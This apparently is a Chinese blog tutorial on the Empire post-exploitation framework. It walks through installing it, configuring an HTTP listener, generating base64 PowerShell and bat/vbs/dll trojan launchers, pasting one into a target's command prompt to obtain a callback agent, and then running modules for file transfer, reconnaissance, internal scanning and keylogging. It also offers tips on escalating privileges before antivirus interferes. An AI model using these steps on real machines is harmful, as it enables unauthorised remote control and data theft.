Empire- 後滲測試

Empire 後滲工具使用

  1. Empire後滲測試工具重點先說明這支持內網跨網也不行(可能可以公網連接沒測試);
  2. 這個工具主要原理通過Python建立一個http服務讓agent進行回調至目標
  3. Agent端目前只支持windows系統

下載工具

Github: https://github.com/EmpireProject/Empire
下載命令: git clone https://github.com/EmpireProject/Empire.git

安裝步驟

Empiresetup目錄執行install.sh文件
./install.sh 或者不行就 ./reset.sh
Tips: 您將獲得有關python的一些問題,實際上僅足夠下載此工具庫。

使用基本的工具步驟

展示界面
在這裏插入圖片描述

  1. 使用模塊使用
    在這裏插入圖片描述
  2. 展示Listeners http模塊中的info
    設置名稱: set Name door
    設置端口: set Port 4447(自己本機代理監聽端口)
    設置反彈地址: set Host 0.0.0.0 (也就是自己的地址)
    執行生成好的代理: execute
    在這裏插入圖片描述
  3. 接下來相當於設置payload(形成木馬,該木馬內容經過base64編譯但頭部沒有)
    命令: launcher powershell door(只是你生成的代理名稱)
    在這裏插入圖片描述
  4. 生成bat,vbs等木馬方法
    命令:usetarger windows/dll
    查看參數選項: info
    Tips: 根據自己需求格式就如上命令所示選中在通過info進行設置相應的參數即可,生成的bat包運行後會自動消失。
    在這裏插入圖片描述

客戶端操作流程

  1. 將生成好的base64木馬直接粘貼至cmd命令框中
    在這裏插入圖片描述
  2. 服務端已監聽狀態顯示
    命令: agents (顯示當前已成功監聽的client,如果監聽斷開連接如碰到關機斷網的情況下則出現紅色字眼)

在這裏插入圖片描述
3. 進入client客戶端

4. 控制客戶端命令(如:上傳,下載,查看主機信息,掃描內網存活主機)
Tips: 這些功能有些在使用的時候目標主機會報毒,所以儘可能在拿到shell情況下趕緊提權維持會話等操作,因爲這個工具目前好像只能提供展示的零時會話。進入客戶端也會有兩大常用模塊。

使用模塊命令: usemodule situational_awareness
在這裏插入圖片描述
Tips: 其實更多模塊可以參照其他博客(說實話其他的功能也沒什麼特別適用於真是環境的)

問題:

  1. 生成的木馬不能夠免殺 該工具已經停止維護。
  2. Client控制的時候很多模塊會報毒及記錄不穩定比如鍵盤記錄等…
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章